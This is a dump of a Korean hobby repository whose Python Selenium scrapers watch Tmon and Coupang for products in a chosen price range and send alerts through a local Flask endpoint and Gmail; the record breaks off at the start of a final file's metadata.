"alphanum_fraction": 0.7233285903930664,
"avg_line_length": 36.83333206176758,
"blob_id": "3b3f9e1540f090670d043bd72837d3f538ec7fd4",
"content_id": "bc7bd6898377978826204b23e2bc091e1efd1f9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1406,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 36,
"path": "/Homework 3/hw3q2.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#hw 3 question 2\r\n\r\n#getting user input\r\nfirstItem = float(input(\" Enter price of first item: \"))\r\nsecondItem = float(input (\"Enter price of second item: \"))\r\ntotal = firstItem + secondItem#total before discount\r\n#comparing prices to give 50% discount\r\nif firstItem > secondItem:\r\n secondItem1 = secondItem * 0.5\r\n firstItem1 = firstItem\r\nelif secondItem > firstItem:\r\n firstItem1 = firstItem * 0.5\r\n secondItem1 = secondItem\r\nelif secondItem == firstItem:\r\n secondItem1 = secondItem * 0.5\r\n firstItem1 = firstItem\r\n#first discount total\r\ntotalWithFirstDiscount = firstItem1 + secondItem1\r\n#asking user if they are members\r\nmembership = input(\"Does customer have a club card? Enter Y/N: \")\r\n#if member apply 10% discount\r\nif membership == 'Y' or 'y':\r\n secondDiscount = totalWithFirstDiscount * 0.10\r\n totalWithSecondDiscount = totalWithFirstDiscount - secondDiscount\r\nelif membership == 'N' or 'n':\r\n totalWithSecondDiscount = totalWithFirstDiscount\r\n#asking for tax rate\r\ntaxrate = float(input(\"Enter tax rate, e.g. 5.5 for 5.5% tax: \"))\r\n#calculating tax\r\ntax = totalWithSecondDiscount * (taxrate/100)\r\n#calculating total with both discounts and tax\r\ntotalPrice = totalWithSecondDiscount + tax\r\n#printing results \r\nprint(\"Base price = \",round(total,2))\r\nprint(\"Price after discounts = \",round(totalWithSecondDiscount,2))\r\nprint(\"Total price: \", round(totalPrice,2))\r\n\r\n \r\n"
},
{
"alpha_fraction": 0.6892430186271667,
"alphanum_fraction": 0.7031872272491455,
"avg_line_length": 31.46666717529297,
"blob_id": "72b4a3aa05f10ee0421e584d34f8643992faf8db",
"content_id": "540b6310945350c3a208000153a41e9199ad5fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 502,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 15,
"path": "/Homework 5/hw5q5a.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#getting user length of sequence \r\nlength = int(input(\"please enter the length of the sequence: \"))\r\n#set a variable to 0 to compare to length \r\nstart = 0\r\n#total of all numbers set to 1 for now \r\ntotal = 1\r\n#loops while start isnt equal to length \r\nwhile start != length:\r\n userNumber = int(input(\"Please enter a positive integer: \"))\r\n total = userNumber * total\r\n start += 1\r\n#calculating geometric mean \r\ngeometricMean = total**(1/length)\r\n#printing output\r\nprint(round(geometricMean,3))\r\n"
},
{
"alpha_fraction": 0.6822222471237183,
"alphanum_fraction": 0.6822222471237183,
"avg_line_length": 29.714284896850586,
"blob_id": "321e143f746f27665d95936a76cc0dbda7f2f913",
"content_id": "b8489cfa36515b31189f8e150cea33ba3c48560e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 450,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 14,
"path": "/Homework 5/hw5q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#getting string from user\r\nstring = input(\"Please enter a string: \")\r\n#beginning with empty string to further assign each character in \r\nemptyString = \" \"\r\n#initiate detection as true \r\ndetection = True \r\nfor character in string:\r\n if character < emptyString:\r\n detection = False \r\n emptyString = character\r\nif detection == True:\r\n print(string, \"is increasing\")\r\nif detection == False:\r\n print(string, \"is not increasing\")\r\n \r\n"
},
{
"alpha_fraction": 0.7475845217704773,
"alphanum_fraction": 0.751207709312439,
"avg_line_length": 23.090909957885742,
"blob_id": "fb16717cf25773088b75dde9639f157cf3c5eb71",
"content_id": "23da5ef1f9ff772e3d0334c008343248d8783e1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 828,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 33,
"path": "/Homework 4/hw4q1.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#part a \r\n\r\n#asking user to input odd length string\r\nuserString = input(\"Please enter a string of odd length: \")\r\n\r\n#getting the length of the string\r\nuserStringLength = len(userString)\r\n\r\n#dividing the string by integer division\r\nindexOfMiddleCharacter = (userStringLength // 2) \r\n\r\n#getting the index that number\r\nmiddleCharacter = userString[indexOfMiddleCharacter]\r\n#printing the output\r\n\r\nprint(\"middle character: \", middleCharacter)\r\n\r\n\r\n#part b\r\n\r\n#getting the first half of the string by splitting\r\nfirstHalf = userString[0:indexOfMiddleCharacter]\r\n\r\n#printing the output\r\nprint(\"The first half of the string: \",firstHalf)\r\n\r\n#c\r\n\r\n#getting the second half of the string by splitting\r\nsecondHalf = userString[indexOfMiddleCharacter+1:]\r\n\r\n#printing the second half \r\nprint(\"The second half of the string: \",secondHalf)\r\n"
},
{
"alpha_fraction": 0.6958855390548706,
"alphanum_fraction": 0.7209302186965942,
"avg_line_length": 32.6875,
"blob_id": "e725b0e46960deb9e17fb61e833991ebd3259076",
"content_id": "a329b3ca235d3fa1227a4d1507135e77d00e01cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 559,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 16,
"path": "/Homework 2/hw2q1b.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#takes user weight and height converts and then uses BMI formula\r\n\r\noneKilogram = 0.453592 # one kilogram in a pound\r\noneMeter = 0.0254 #one meter in an inch \r\n\r\nuserPound = float(input(\"please enter weight in pounds:\")) #takes users weight in pound\r\n\r\nkilograms = userPound * oneKilogram #converts to kilogram \r\n\r\nuserInches = float(input(\"please enter height in inches:\"))#takes users height inches\r\n\r\ninches = userInches * oneMeter #converts to meters \r\n\r\nBMI = kilograms / (inches**2) #bmi formula \r\n\r\nprint(\"BMI is:\", round(BMI,7))#printing outcome\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.4741035997867584,
"alphanum_fraction": 0.49800798296928406,
"avg_line_length": 16.69230842590332,
"blob_id": "a7fff44eca2acea1d839b5dcdaebcdbd0af3747f",
"content_id": "ac905dd5c1455e745f464e5ff1574ada8ea4836f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 13,
"path": "/Homework 5/hw5q8.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "userInput = int(input(\"please enter number\"))\r\n\r\nn = 0\r\nm = \"1\"\r\nnum = 1\r\nspace = ' '\r\nwhile n != userInput:\r\n line = space* (userInput-n) + m\r\n nextNumber = num + 1\r\n num += 1 \r\n m += str(nextNumber)\r\n n += 1\r\n print(line)\r\n \r\n\r\n"
}
] | 36 |
ggm1207/Observer_KR
|
https://github.com/ggm1207/Observer_KR
|
81d7388e3f440bf64dd45aad6f05407a0ef2add1
|
260bac13cf14938b8e7e81e4c35287da67f50b4b
|
e73ecd8e865593743210e174b7f109ce39492ce0
|
refs/heads/master
| 2022-12-18T22:48:14.122686 | 2020-09-22T05:44:00 | 2020-09-22T05:44:00 | 270,396,048 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6472346782684326,
"alphanum_fraction": 0.6786248087882996,
"avg_line_length": 26.875,
"blob_id": "1c05faad8805f2b9ece7907e480e5d703ec7665a",
"content_id": "addcbcc3858dbf8487682d2ec87eb40ba3e3a3b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1363,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 24,
"path": "/README.md",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "# Observer_KR\n\n닌텐도 스위치를 사기 위해 시작했던 프로젝트이지만 당근마켓에서 이미 구했으므로 기존 구현에서 더욱 확장해서 사고싶은 물건을 원하는 가격대에 구매할 수 있게 감시해주는 \n\n## Idea\n\n- 키워드와 금액대로 내가 원하는 물건을 어느 정도 특정지을 수 있지 않을까\n - ex ) 닌텐도 스위치, 340,000 ~ 380,000 원\n - 원하는 물건이 선택이 안 될 수도 있음.\n- 사용자가 직접 입력한 URL을 감시하면서 사용자에게 금액 변화를 KakaoTalk, SMS, Email 을 통해 전송\n - 원하는 물건은 선택 되나 금액 변화( 할인 )가 없을 수도 있음. # 사용자로 하여금 의심하게 만듬.\n- 구매또한 가능할 것 같아서 집어넣을려 했으나 원하는 물건을 특정짓는게 완벽히 되지 않기 때문에 혹여나 어떠한 불상사가 일어날 수도 있으니 제한.\n\n\n## Architecture\n\n언제든지 수정 될 수 있습니다. ( 2020.06.14 )\n\n\n\n## 현재 상황\n\n원하는 기능은 구현을 했지만.. 잘 짠 코드라고 생각하지 않았습니다. 문제점 파악 후 현재는 Python 클린 코드 책을 산 후 공부중에 있습니다.\n그리고 현실적으로 내가 지금 당장 해야 되는 것들을 공부하고 있습니다.\n"
},
{
"alpha_fraction": 0.5858352780342102,
"alphanum_fraction": 0.5896843671798706,
"avg_line_length": 22.178571701049805,
"blob_id": "624b3059bcbb26bf0bacfb7504ce9820b0642c6a",
"content_id": "76fe4dc1ec97f4c7ed53f471373a2385daff6776",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1299,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 56,
"path": "/utils.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import logging\nfrom urllib import parse\nfrom collections import defaultdict\n\n\nfrom rich.logging import RichHandler\nfrom rich.traceback import install\n\ninstall()\n\nFORMAT = \"%(message)s\"\nlogging.basicConfig(\n level=logging.INFO, format=FORMAT, datefmt=\"[%Y-%m-%d %X]\",\n handlers=[RichHandler()]\n )\n\nlog = logging.getLogger(\"rich\")\n\ndef getLogger():\n global log\n return log\n\n\ndef parsingFile(fpath):\n parser = {}\n dup_check = defaultdict(int)\n\n for line in open(fpath, 'r'):\n line = line.rstrip('\\n')\n if line == '': continue\n if line.startswith('['):\n section = line[1:-1]\n if section == 'product':\n dup_check[section] += 1\n section = section + str(dup_check[section])\n parser[section] = {}\n continue\n if line.startswith('#'):\n continue\n key, value = line.split('=') \n parser[section][key] = int(value) if value.isdecimal() else value\n return parser\n\ndef grouped(iterable, n):\n return zip(*[iter(iterable)]*n)\n\ndef tm2int(text):\n return int(text.replace(',',''))\n\ndef hangul2url(text):\n return parse.quote(text)\n\n\nif __name__ == \"__main__\":\n print(parsingFile('./config/product'))\n print(parsingFile('./config/login'))\n\n"
},
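The config format `parsingFile()` accepts follows from the parser above: `[section]` headers, `key=value` pairs, `#` comments, blank lines, and repeated `[product]` sections that get renamed `product1`, `product2`, and so on. The sample contents below are hypothetical:

```python
SAMPLE_PRODUCT_CONFIG = """\
[product]
keyword=nintendo switch
low_price=340000
high_price=380000

[product]
# comment lines and blank lines are skipped
keyword=ring fit
low_price=50000
high_price=70000
"""

# Expected result of parsingFile() on a file with these contents
# (decimal-looking values are converted with int()):
# {'product1': {'keyword': 'nintendo switch', 'low_price': 340000,
#               'high_price': 380000},
#  'product2': {'keyword': 'ring fit', 'low_price': 50000,
#               'high_price': 70000}}
```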
{
"alpha_fraction": 0.5480226278305054,
"alphanum_fraction": 0.5511613488197327,
"avg_line_length": 28.481481552124023,
"blob_id": "d079a70dfe047de547da54a1390622493270f24f",
"content_id": "0e7d73458078cbbdf75020670140c5bef534617a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1593,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 54,
"path": "/eventlistener/apis/gmail.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport smtplib\nfrom email.mime.text import MIMEText\n\nabs_dir = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.join(abs_dir, '..', '..'))\n\nfrom .base import BaseApi\nfrom utils import parsingFile\n\nclass Gmail(BaseApi):\n def __init__(self):\n super().__init__(\"google\")\n print('Gmail Init')\n self.msg_keyword = \"Observer: {}\\nProduct Num: {}\\n\"\n\n def login(self):\n self.GMAIL_ID = self.api_login['google']['id']\n self.GMAIL_PWD = self.api_login['google']['pw']\n\n try:\n self.smtp = smtplib.SMTP('smtp.gmail.com', 587)\n self.smtp.ehlo()\n self.smtp.starttls()\n self.smtp.login(self.GMAIL_ID, self.GMAIL_PWD)\n except:\n self.__del__()\n\n def _parsing_keyword(self, datas):\n msg = \"\"\n for link, products in datas['links'].items():\n msg += '*' * 30 + '\\n'\n msg += 'Link:{}\\n'.format(link)\n for title, price in products.items():\n msg += '{} {}\\n'.format(title, price)\n msg += '\\n'\n\n self.msg_keyword = self.msg_keyword.format(datas['name'], datas['lens'])\n self.msg_keyword += msg\n\n self.send_gmail(self.msg_keyword)\n\n def _parsing_url(self, datas):\n pass\n\n def send_gmail(self, msg):\n email = self.GMAIL_ID + \"@gmail.com\"\n mimetext = MIMEText(msg)\n mimetext['Subject'] = \"Observer Notification\"\n mimetext['To'] = email\n self.smtp.sendmail(email, \"[email protected]\", mimetext.as_string())\n\n self.smtp.quit()\n\n"
},
{
"alpha_fraction": 0.481189101934433,
"alphanum_fraction": 0.4894188642501831,
"avg_line_length": 34.44047546386719,
"blob_id": "d5dc9505a3b23435ae0361ef1f598147342912ec",
"content_id": "54b93fca42ac813480ec6d8f421c620f81b1ee10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6114,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 168,
"path": "/observers/tmon.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import sys\n\nfrom selenium.common.exceptions import NoSuchElementException\n\nsys.path.append('..')\nfrom utils import tm2int, hangul2url\nfrom base import BaseCralwer, tryfindelements\nfrom urls import TMON_LOGIN_URL, TMON_SEARCH_URL\n\nclass Tmon(BaseCralwer):\n def __init__(self): # init, login, delete alert\n super().__init__()\n self.log.info(\"TMON Observer Starting...\")\n self.links = []\n\n def login(self):\n self.log.info(\"TMON Observer Login...\")\n key = self.login_key['tmon']\n self.get(TMON_LOGIN_URL)\n self.findE_id('userid').send_keys(key['id'])\n self.findE_id('pwd').send_keys(key['pw'])\n self.findE_lt('로그인').click()\n self.get('http://search.tmon.co.kr') \n\n # 오늘 하루 보지 않기, 1번 클릭하면 모든 팝업 다 지워짐\n expires = None\n try:\n expires = self.findE_cn(\"expires\")\n expires.click()\n except:\n self.log.info(\"TMON Observer doesn't click expires.\")\n\n\n def search_products(self, prod):\n self.log.info(\"TMON Observer Searching Products...\")\n\n scrolls = 0\n self.get(TMON_SEARCH_URL.format(hangul2url(prod['keyword'])))\n\n self.scrollsTo(200000)\n\n self.links = [] # flush\n\n links = self.findEs_cs('section > div > ul > div > div > li > a')\n prices = self.findEs_cs('span.price > span.sale > i')\n low_limit = prod['low_price'] // 2\n \n for link, price in zip(links, prices):\n price = tm2int(price.text)\n\n # 상품의 최소 가격이 제시값을 넘는 경우\n if price > prod['high_price']:\n continue\n \n # 상품의 최소 가격이 너무 낮은 경우: 안에 있는 상품들이 사용자의 요구를 충족하지 못할거라고 가정\n if price < low_limit:\n continue\n self.links.append(link.get_attribute('href'))\n\n def check_products(self, prod):\n self.log.info(\"TMON Observer Checking Products...\")\n datas = {\n 'type': 'keyword',\n 'name': 'Tmon'\n }\n idx = 0\n for link in self.links:\n sub_titles, sub_prices = self.check_tmon_product(link, prod)\n if not sub_titles:\n continue\n datas['link' + str(idx)] = link + '\\n' + \\\n '\\n'.join([title + '\\n' + str(price) for title, price in zip(sub_titles, sub_prices)])\n idx += 1\n datas['lens'] = idx\n\n if idx:\n self.send_datas('http://127.0.0.1:5000/gateway', datas)\n\n def check_tmon_product(self, link, prod):\n self.log.info(\"TMON Observer Checking Urls:{}\".format(link))\n\n self.get(link)\n\n o_cssSelector = '#_optionScroll > div > div > div > div.dep-sel.dep{} > ul > li'\n options = self.findEs_cn(\"dep-sel\")\n o_len = len(options) // 2\n\n if o_len == 0:\n product = self.findE_cs(\"ul.prod > li > span.tit\").text\n price = self.findE_cs(\"div.price_area > div > div > span > strong\").text\n price = tm2int(price)\n if prod['low_price'] <= price <= prod['high_price']:\n return [product], [price] \n return [], []\n\n o_cIdx = 0\n o_sList = [0 for _ in range(o_len)]\n options = options[:o_len]\n o_maxList = [len(self.findEs_cs(o_cssSelector.format(0)))//2]\n\n # start\n options[0].click()\n\n products, prices = [], []\n\n while True:\n # product choiced\n if o_cIdx == o_len:\n product_price, product_title = None, None\n \n while not (product_price and product_title):\n try:\n product_price = self.findE_cs('div.price_area > div > div > span > strong')\n product_title = self.findE_xp('//*[@id=\"_optionScroll\"]/div/ul[1]/li/span[1]')\n product_price = tm2int(product_price.text) \n except NoSuchElementException:\n self.log.warning(\"NoSuchElementException:product_price,product_title\")\n last_option = None\n while not last_option:\n try:\n options[o_cIdx-1].click()\n last_option = self.findEs_cs(o_cssSelector.format( \\\n o_cIdx-1))[o_sList[o_cIdx-1]-1]\n last_option.click()\n except 
NoSuchElementException:\n self.log.warning(\"NoSuchElementException:last_option\")\n if prod['low_price'] <= product_price <= prod['high_price']:\n products.append(product_title.text)\n prices.append(product_price)\n\n o_cIdx -= 1\n self.findE_cn(\"del\").click()\n options[o_cIdx].click()\n continue\n \n # option add maxlen\n if o_sList[o_cIdx] == 0 and o_cIdx != 0:\n o_maxList.append(len(self.findEs_cs(o_cssSelector.format(o_cIdx)))//2)\n \n # option arrived maxlen\n if o_sList[o_cIdx] == o_maxList[o_cIdx]:\n o_sList[o_cIdx] = 0\n o_cIdx -= 1\n options[o_cIdx].click()\n o_maxList.pop()\n if o_maxList:\n continue\n break\n \n with tryfindelements(self.findEs_cs, o_cssSelector.format(o_cIdx)) as n_option:\n n_option = n_option[o_sList[o_cIdx]] \n o_sList[o_cIdx] += 1 # option:n plus\n\n if n_option.get_attribute(\"class\") == \"soldout\":\n continue\n n_option.click()\n o_cIdx += 1 # options: n to n+1\n\n return products, prices\n \n \n def check_urls(self):\n pass\n \n\nif __name__ == \"__main__\":\n a = Tmon()\n a.run()\n"
},
{
"alpha_fraction": 0.5459302067756653,
"alphanum_fraction": 0.5476744174957275,
"avg_line_length": 26.74193572998047,
"blob_id": "a418c74694fffd4618cfa9da41aa4dc34a16cfd8",
"content_id": "366effc7d23a9f3451567f41a69e279f20dd8dde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1720,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 62,
"path": "/eventlistener/api.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\nfrom flask import Flask\nfrom tinydb import TinyDB, Query\nfrom flask_restful import reqparse\nfrom flask_restful import Resource, Api\n\nabs_dir = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.join(abs_dir, '..'))\nfrom apis.gmail import Gmail\nfrom utils import grouped\n\napp = Flask(__name__)\napi = Api(app)\n\nclass EventLister(Resource):\n def __init__(self):\n self.types = ['keyword', 'url']\n self.apis = []\n self.apis.append(Gmail())\n\n def parsing(self, parser, tp, lens):\n for idx in range(lens):\n parser.add_argument('link{}'.format(idx), type=str)\n\n args = parser.parse_args()\n links = {'links' : {}}\n for k, v in args.items():\n if not k.startswith('link'):\n continue\n link, value = v.split('\\n')[0], v.split('\\n')[1:]\n links['links'][link] = {t: p for t, p in grouped(value, 2)}\n return links\n\n def post(self):\n try:\n parser = reqparse.RequestParser()\n parser.add_argument('type', type=str)\n parser.add_argument('lens', type=int)\n parser.add_argument('name', type=str)\n\n args = parser.parse_args()\n\n if args['type'] not in self.types:\n return {'error': 'none type'}\n\n datas = self.parsing(parser, args['type'], args['lens']) \n datas.update(args)\n print(datas)\n for api in self.apis:\n api.parsing(datas)\n \n except Exception as e:\n print(e)\n return {'error' : str(e)}\n \n\napi.add_resource(EventLister, '/gateway')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n"
},
{
"alpha_fraction": 0.5422848463058472,
"alphanum_fraction": 0.549332320690155,
"avg_line_length": 30.34883689880371,
"blob_id": "3d5f4d36376e0f78a4c7cef81f77b8f9c898f457",
"content_id": "e1a4f84ad4c41ee8cbb159709d8416c832d6e379",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2700,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 86,
"path": "/observers/coupang.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import sys\nfrom time import sleep\n\nfrom selenium.common.exceptions import NoSuchElementException\n\nsys.path.append('..')\nfrom utils import tm2int, hangul2url\nfrom base import BaseCralwer\nfrom urls import COUPANG_LOGIN_URL, COUPANG_SEARCH_URL\n\n\nclass Coupang(BaseCralwer):\n def __init__(self): # init, login, delete alert\n super().__init__()\n self.log.info(\"COUPANG Observer Starting...\")\n self.products = []\n\n def login(self):\n self.log.info(\"COUPANG Observer Login...\")\n self.get(COUPANG_LOGIN_URL) \n\n self.findE_id('login-email-input').send_keys(self.login_key['coupang']['id'])\n self.findE_id('login-password-input').send_keys(self.login_key['coupang']['pw'])\n self.findE_cn('login__button').click()\n\n def search_products(self, prod):\n self.log.info(\"COUPANG Observer Searching Products...\")\n self.get(COUPANG_SEARCH_URL.format(hangul2url(prod['keyword'])))\n\n pages = 10\n self.links = []\n self.titles = []\n self.prices = []\n\n while pages:\n titles = self.findEs_cs(\"a > dl > dd > div > div.name\")\n prices = self.findEs_cs(\"div.price > em > strong\")\n links = self.findEs_cs(\"form > div > div > ul > li > a\")\n for price, link, title in zip(prices, links, titles):\n price = tm2int(price.text)\n if price > prod['high_price']: continue\n if price < prod['low_price']: continue\n\n self.prices.append(price)\n self.titles.append(title.text)\n self.links.append(link.get_attribute(\"href\"))\n\n # self.findE_cn(\"btn-next\").click()\n self.findE_lt(\"다음\").click()\n\n pages -= 1\n\n def check_products(self, prod):\n self.log.info(\"COUPANG Observer Checking Products...\")\n datas = {\n 'type': 'keyword',\n 'name': 'Coupang',\n }\n\n idx = 0\n for link, title, price in zip(self.links, self.titles, self.prices):\n if not self.check_coupang_product(link):\n continue\n\n datas['link' + str(idx)] = link + '\\n' + '{} {}\\n'.format(title, price)\n idx += 1\n datas['lens'] = idx\n if idx:\n self.send_datas('http://127.0.0.1:5000/gateway', datas)\n\n \n\n def check_coupang_product(self, link):\n self.log.info(\"COUPANG Observer Checking Urls:{}\".format(link))\n self.get(link)\n\n if self.findE_cn(\"prod-buy-btn\") == \"\":\n return False\n return True\n \n def check_urls(self):\n pass\n\nif __name__ == \"__main__\":\n a = Coupang() # test\n a.run()\n"
},
{
"alpha_fraction": 0.5595340728759766,
"alphanum_fraction": 0.5752804279327393,
"avg_line_length": 29.5,
"blob_id": "42f7397331854241f018fc37d28f5210314192c3",
"content_id": "f8c0eba3782db7d2a209eccc1c0707497c91fc1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4698,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 152,
"path": "/observers/base.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "import sys\nimport smtplib\nimport datetime\nimport requests\nfrom time import sleep\nfrom email.mime.text import MIMEText\n\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup as bs\n\nsys.path.append('..')\nfrom utils import parsingFile, getLogger\n\n\nclass SMTP: \n def __init__(self):\n self.log = getLogger()\n self.user_info = parsingFile('../config/login') \n self.login()\n\n def login(self):\n GMAIL_ID = self.user_info['google']['id']\n GMAIL_PWD = self.user_info['google']['pw']\n try:\n self.smtp = smtplib.SMTP('smtp.gateway.com', 587)\n self.smtp.ehlo()\n self.smtp.starttls()\n self.smtp.login(GMAIL_ID, GMAIL_PWD)\n self.log.info('SMTP Login SUCCESS')\n except:\n self.log.error('SMTP Login FAILED')\n self.__del__()\n\n def __del__(self):\n self.smtp = None\n \n def send(self, mimetext: MIMEText):\n self.smtp.sendmail(GMAIL_ID, GMAIL_ID, mimetext.as_string())\n\n\nclass tryfindelements:\n def __init__(self, method, command):\n self.temp = None\n self.method = method\n self.command = command\n\n def __enter__(self):\n try_limit = 10\n while not self.temp and try_limit:\n try:\n self.temp = self.method(self.command)\n except:\n try_limit -= 1\n return self.temp\n\n def __exit__(self, type, value, traceback):\n pass\n\n\nclass BaseCralwer:\n def __init__(self):\n self.log = getLogger()\n self._driver_access()\n self._driver_init()\n self.prod_key = parsingFile('../config/product')\n self.login_key = parsingFile('../config/login')\n\n def __del__(self):\n self.driver.quit()\n\n def login(self):\n raise NotImplementedError\n\n # 조건(low, high)에 해당하는 product 들을 반환\n def search_products(self):\n raise NotImplementedError\n\n # product가 구매 가능한지를 반환\n def check_products(self):\n raise NotImplementedError\n \n # url이 구매 가능한지를 반환\n def check_urls(self):\n raise NotImplementedError\n \n def _driver_access(self):\n try:\n op = webdriver.ChromeOptions()\n op.add_argument('headless')\n op.add_argument('window-size=1920x1080')\n # op.add_argument('disable-gpu')\n # fake headless\n op.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\")\n prefs = {\n \"profile.managed_default_content_settings.images\": 2,\n \"disk-cache-size\": 4096\n }\n op.add_experimental_option(\"prefs\", prefs)\n self.driver = webdriver.Chrome('/home/gunmo/public/chromedriver', \n options=op)\n self.driver.implicitly_wait(1)\n self.log.info('ChromeDriver Access')\n except:\n self.log.error('ChromeDriver Access Failed')\n\n def _driver_init(self):\n self.findE_id = self.driver.find_element_by_id\n self.findE_xp = self.driver.find_element_by_xpath\n self.findE_lt = self.driver.find_element_by_link_text\n self.findE_cn = self.driver.find_element_by_class_name\n self.findE_cs = self.driver.find_element_by_css_selector\n\n self.findEs_cn = self.driver.find_elements_by_class_name\n self.findEs_cs = self.driver.find_elements_by_css_selector\n\n def get(self, url):\n cur_url = None\n while url != self.driver.current_url and cur_url != self.driver.current_url:\n self.log.info(\"Observer Trying:{}\".format(url))\n cur_url = self.driver.current_url\n self.driver.get(url)\n sleep(0.5)\n\n def scrollsTo(self, scroll_limit):\n scrolls = 0\n while scrolls < scroll_limit:\n scrolls += 10000\n self.driver.execute_script(\"window.scrollTo(0, {})\".format(scrolls))\n sleep(0.3)\n\n def send_datas(self, url, datas):\n requests.post(url, data=datas)\n\n def send_test(self):\n datas = {'type': 'keyword', 'lens': 5, 'name': 
'testname'}\n for i in range(5):\n datas['link' + str(i)] = 'linkexample.com\\ntitle\\nprice\\ntitle2\\nprice2'\n \n print(datas)\n self.send_datas('http://127.0.0.1:5000/gateway', datas)\n\n def run(self):\n self.login()\n for prod in self.prod_key.values():\n self.search_products(prod)\n self.check_products(prod)\n\n\nif __name__ == \"__main__\":\n a = BaseCralwer()\n a.send_test()\n del a\n"
},
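`tryfindelements` above is tied to Selenium lookups; as a dependency-free illustration of the same retry-until-truthy pattern, here is a sketch (all names in it are ours, not from the project):

```python
class retry_call:
    """Keep calling a flaky callable until it returns something truthy or the
    attempt budget runs out; the budget is spent on every attempt so a
    permanently failing callable cannot loop forever."""

    def __init__(self, fn, *args, attempts=10):
        self._fn, self._args, self._attempts = fn, args, attempts
        self._result = None

    def __enter__(self):
        while self._result is None and self._attempts:
            self._attempts -= 1
            try:
                self._result = self._fn(*self._args)
            except Exception:
                pass
        return self._result

    def __exit__(self, exc_type, exc, tb):
        return False

flaky = iter([None, None, "found"])  # fails twice, then succeeds

def lookup():
    value = next(flaky)
    if value is None:
        raise LookupError("not ready yet")
    return value

with retry_call(lookup) as result:
    print(result)  # -> found
```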
{
"alpha_fraction": 0.7244898080825806,
"alphanum_fraction": 0.7244898080825806,
"avg_line_length": 57.79999923706055,
"blob_id": "8526f85ffdc51c13c439a4d6db7fe5c90753857f",
"content_id": "8a6ef50b3a2ddd41001d10cec57349144cb217b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 294,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 5,
"path": "/observers/urls.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
"text": "TMON_LOGIN_URL = \"https://login.tmon.co.kr/user/loginform?return_url=\"\nTMON_SEARCH_URL = \"http://search.tmon.co.kr/search/?keyword={}&thr=ts\"\n\nCOUPANG_LOGIN_URL = \"https://login.coupang.com/login/login.pang\"\nCOUPANG_SEARCH_URL = \"https://www.coupang.com/np/search?component=&q={}&channel=user\"\n"
},
{
"alpha_fraction": 0.5634146332740784,
"alphanum_fraction": 0.5634146332740784,
"avg_line_length": 25.45161247253418,
"blob_id": "08db2e672a4e22ce699aa328125c9a4e3b5fecce",
"content_id": "8e7c9870e0d548dc5130b242839e489ec972fca5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 820,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 31,
"path": "/eventlistener/apis/base.py",
"repo_name": "ggm1207/Observer_KR",
"src_encoding": "UTF-8",
